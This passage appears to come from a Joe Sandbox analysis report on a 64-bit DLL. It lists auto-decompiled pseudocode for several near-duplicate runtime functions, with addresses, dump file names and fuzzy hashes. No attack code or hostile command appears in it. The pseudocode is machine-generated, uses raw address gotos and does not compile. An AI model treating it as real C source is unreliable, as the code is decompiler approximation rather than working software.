                                                                      				E00000001180013858(_t62, _t64, _t68, _t71, _t73, _t74, _t78);
                                                                      				goto 0x8001a34d;
                                                                      				 *_t71 =  *( *(_t68 + 0x488 + _t62 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}



















                                                                      0x18001a2a8
                                                                      0x18001a2b9
                                                                      0x18001a2bc
                                                                      0x18001a2be
                                                                      0x18001a2c3
                                                                      0x18001a2c7
                                                                      0x18001a2cc
                                                                      0x18001a2d0
                                                                      0x18001a2df
                                                                      0x18001a2e1
                                                                      0x18001a2e7
                                                                      0x18001a2ea
                                                                      0x18001a2ef
                                                                      0x18001a2f3
                                                                      0x18001a2fa
                                                                      0x18001a300
                                                                      0x18001a305
                                                                      0x18001a30a
                                                                      0x18001a311
                                                                      0x18001a321
                                                                      0x18001a323
                                                                      0x18001a32d
                                                                      0x18001a332
                                                                      0x18001a33a
                                                                      0x18001a33c
                                                                      0x18001a342
                                                                      0x18001a347
                                                                      0x18001a34a
                                                                      0x18001a350
                                                                      0x18001a352
                                                                      0x18001a356
                                                                      0x18001a35c
                                                                      0x18001a366
                                                                      0x18001a368
                                                                      0x18001a36c
                                                                      0x18001a36f
                                                                      0x18001a376
                                                                      0x18001a37a
                                                                      0x18001a381
                                                                      0x18001a385
                                                                      0x18001a38a
                                                                      0x18001a38f
                                                                      0x18001a394
                                                                      0x18001a3a1
                                                                      0x18001a3b0

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cd20b360deb10576876a1745d7f3ea639713bd980d60ff6c224e2e325fcc08a
                                                                      • Instruction ID: 6250d07997e561b7e4747bbf9f02ac3ec4200d64b7f3c780d14ed19c5de0d467
                                                                      • Opcode Fuzzy Hash: 4cd20b360deb10576876a1745d7f3ea639713bd980d60ff6c224e2e325fcc08a
                                                                      • Instruction Fuzzy Hash: 7531D472218B94C6EBA18F29D0403AD77A0F78DB8CF248115EB9C4B751DF36C696DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800182E8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				signed long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed long long* _t71;
                                                                      				signed long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018313;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800183e1;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018354;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x800183e3;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800183d4;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018390;
                                                                      				 *_t71 = 1;
                                                                      				_t71[0] = r9w;
                                                                      				_t71[2] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800183e3;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024A10(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80018388;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x8001838b;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x1800182e8
                                                                      0x1800182e8
                                                                      0x1800182f9
                                                                      0x1800182fc
                                                                      0x1800182fe
                                                                      0x180018303
                                                                      0x180018307
                                                                      0x18001830b
                                                                      0x18001830e
                                                                      0x18001831d
                                                                      0x18001831f
                                                                      0x180018325
                                                                      0x180018328
                                                                      0x18001832d
                                                                      0x180018331
                                                                      0x180018338
                                                                      0x18001833e
                                                                      0x180018343
                                                                      0x180018348
                                                                      0x18001834f
                                                                      0x18001835f
                                                                      0x180018361
                                                                      0x18001836b
                                                                      0x180018370
                                                                      0x180018378
                                                                      0x18001837a
                                                                      0x180018380
                                                                      0x180018385
                                                                      0x180018388
                                                                      0x18001838e
                                                                      0x180018390
                                                                      0x180018394
                                                                      0x1800183a4
                                                                      0x1800183a6
                                                                      0x1800183aa
                                                                      0x1800183ad
                                                                      0x1800183b4
                                                                      0x1800183b8
                                                                      0x1800183bf
                                                                      0x1800183c3
                                                                      0x1800183c8
                                                                      0x1800183cd
                                                                      0x1800183d2
                                                                      0x1800183de
                                                                      0x1800183ed

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9467c077bac1272afc550bc4d2e4584f7144020c6b128b55d4d2ea6cf0fd033
                                                                      • Instruction ID: 29d575c279bb5d41915836d3f5ac26d11357c8ae745e24df4180997f29c1f97e
                                                                      • Opcode Fuzzy Hash: b9467c077bac1272afc550bc4d2e4584f7144020c6b128b55d4d2ea6cf0fd033
                                                                      • Instruction Fuzzy Hash: 66318172204A44C6DBA58F19E0803AD77A0F78DF8CF288115EB9D4B750CF36C696DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001A3B4(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a3e1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001a4b0;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a422;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, _t78);
                                                                      				goto 0x8001a4b2;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001a4a2;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001a45e;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001a4b2;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001a456;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t68, _t71, _t73, _t74, _t78);
                                                                      				goto 0x8001a459;
                                                                      				 *_t71 =  *( *(_t68 + 0x488 + _t62 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}



















                                                                      0x18001a3b4
                                                                      0x18001a3c5
                                                                      0x18001a3c8
                                                                      0x18001a3ca
                                                                      0x18001a3cf
                                                                      0x18001a3d3
                                                                      0x18001a3d8
                                                                      0x18001a3dc
                                                                      0x18001a3eb
                                                                      0x18001a3ed
                                                                      0x18001a3f3
                                                                      0x18001a3f6
                                                                      0x18001a3fb
                                                                      0x18001a3ff
                                                                      0x18001a406
                                                                      0x18001a40c
                                                                      0x18001a411
                                                                      0x18001a416
                                                                      0x18001a41d
                                                                      0x18001a42d
                                                                      0x18001a42f
                                                                      0x18001a439
                                                                      0x18001a43e
                                                                      0x18001a446
                                                                      0x18001a448
                                                                      0x18001a44e
                                                                      0x18001a453
                                                                      0x18001a456
                                                                      0x18001a45c
                                                                      0x18001a45e
                                                                      0x18001a462
                                                                      0x18001a468
                                                                      0x18001a472
                                                                      0x18001a474
                                                                      0x18001a478
                                                                      0x18001a47b
                                                                      0x18001a482
                                                                      0x18001a486
                                                                      0x18001a48d
                                                                      0x18001a491
                                                                      0x18001a496
                                                                      0x18001a49b
                                                                      0x18001a4a0
                                                                      0x18001a4ad
                                                                      0x18001a4bc

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc865175531ecdf879953ceedd51c8433dff099852d131511135a6a4724892ea
                                                                      • Instruction ID: 5be07ba218067916cf86360d6e6fdb85136f0dbb7a72fbe1cb2d3bc98ce12563
                                                                      • Opcode Fuzzy Hash: bc865175531ecdf879953ceedd51c8433dff099852d131511135a6a4724892ea
                                                                      • Instruction Fuzzy Hash: A131A272218B54C6EBA18F29E0443AD77A0F79DB8CF248115EB8C4B751DF36C596C714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800183F0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				signed long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed long long* _t71;
                                                                      				signed long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001841b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x800184e9;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001845c;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x800184eb;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800184dc;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018498;
                                                                      				 *_t71 = 1;
                                                                      				_t71[0] = r9w;
                                                                      				_t71[2] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800184eb;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024C14(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80018490;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80018493;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x1800183f0
                                                                      0x1800183f0
                                                                      0x180018401
                                                                      0x180018404
                                                                      0x180018406
                                                                      0x18001840b
                                                                      0x18001840f
                                                                      0x180018413
                                                                      0x180018416
                                                                      0x180018425
                                                                      0x180018427
                                                                      0x18001842d
                                                                      0x180018430
                                                                      0x180018435
                                                                      0x180018439
                                                                      0x180018440
                                                                      0x180018446
                                                                      0x18001844b
                                                                      0x180018450
                                                                      0x180018457
                                                                      0x180018467
                                                                      0x180018469
                                                                      0x180018473
                                                                      0x180018478
                                                                      0x180018480
                                                                      0x180018482
                                                                      0x180018488
                                                                      0x18001848d
                                                                      0x180018490
                                                                      0x180018496
                                                                      0x180018498
                                                                      0x18001849c
                                                                      0x1800184ac
                                                                      0x1800184ae
                                                                      0x1800184b2
                                                                      0x1800184b5
                                                                      0x1800184bc
                                                                      0x1800184c0
                                                                      0x1800184c7
                                                                      0x1800184cb
                                                                      0x1800184d0
                                                                      0x1800184d5
                                                                      0x1800184da
                                                                      0x1800184e6
                                                                      0x1800184f5

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b123a22da8cb72ab9fee80376c71c8eef8c1589e8cda340b591775da82d96b15
                                                                      • Instruction ID: ebf66986cf93b6d3a44bb6991ec4b191d99863ea110f0b6ca252c40f8db73491
                                                                      • Opcode Fuzzy Hash: b123a22da8cb72ab9fee80376c71c8eef8c1589e8cda340b591775da82d96b15
                                                                      • Instruction Fuzzy Hash: D0318072614B48C6EBA18F29E0403AD7BA0F79DB8CF248125EB4C4B751CF36C696DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180018548(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018573;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80018640;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800185b4;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018642;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80018632;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x800185ee;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80018642;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x800185e6;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800185e9;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180018548
                                                                      0x180018559
                                                                      0x18001855c
                                                                      0x18001855e
                                                                      0x180018563
                                                                      0x18001856b
                                                                      0x18001856e
                                                                      0x18001857d
                                                                      0x18001857f
                                                                      0x180018585
                                                                      0x180018588
                                                                      0x18001858d
                                                                      0x180018591
                                                                      0x180018598
                                                                      0x18001859e
                                                                      0x1800185a3
                                                                      0x1800185a8
                                                                      0x1800185af
                                                                      0x1800185bf
                                                                      0x1800185c1
                                                                      0x1800185cb
                                                                      0x1800185cf
                                                                      0x1800185d7
                                                                      0x1800185d9
                                                                      0x1800185df
                                                                      0x1800185e3
                                                                      0x1800185e6
                                                                      0x1800185ec
                                                                      0x1800185ee
                                                                      0x1800185f2
                                                                      0x1800185f8
                                                                      0x180018602
                                                                      0x180018604
                                                                      0x180018608
                                                                      0x18001860b
                                                                      0x180018612
                                                                      0x180018616
                                                                      0x18001861d
                                                                      0x180018621
                                                                      0x180018626
                                                                      0x18001862b
                                                                      0x180018630
                                                                      0x18001863d
                                                                      0x18001864c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction ID: 31283c894e7931bdf7b55ae2ec29c5c766b6295552913056d77ea29eeea56888
                                                                      • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction Fuzzy Hash: 8B31A272204F98C6DBA18F29D4503AD7BA1F79DB88F648125EB8C4B351CF36C256DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180018650(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001867b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80018748;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800186bc;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x8001874a;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001873a;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x800186f6;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001874a;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x800186ee;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x800186f1;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180018650
                                                                      0x180018661
                                                                      0x180018664
                                                                      0x180018666
                                                                      0x18001866b
                                                                      0x180018673
                                                                      0x180018676
                                                                      0x180018685
                                                                      0x180018687
                                                                      0x18001868d
                                                                      0x180018690
                                                                      0x180018695
                                                                      0x180018699
                                                                      0x1800186a0
                                                                      0x1800186a6
                                                                      0x1800186ab
                                                                      0x1800186b0
                                                                      0x1800186b7
                                                                      0x1800186c7
                                                                      0x1800186c9
                                                                      0x1800186d3
                                                                      0x1800186d7
                                                                      0x1800186df
                                                                      0x1800186e1
                                                                      0x1800186e7
                                                                      0x1800186eb
                                                                      0x1800186ee
                                                                      0x1800186f4
                                                                      0x1800186f6
                                                                      0x1800186fa
                                                                      0x180018700
                                                                      0x18001870a
                                                                      0x18001870c
                                                                      0x180018710
                                                                      0x180018713
                                                                      0x18001871a
                                                                      0x18001871e
                                                                      0x180018725
                                                                      0x180018729
                                                                      0x18001872e
                                                                      0x180018733
                                                                      0x180018738
                                                                      0x180018745
                                                                      0x180018754

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
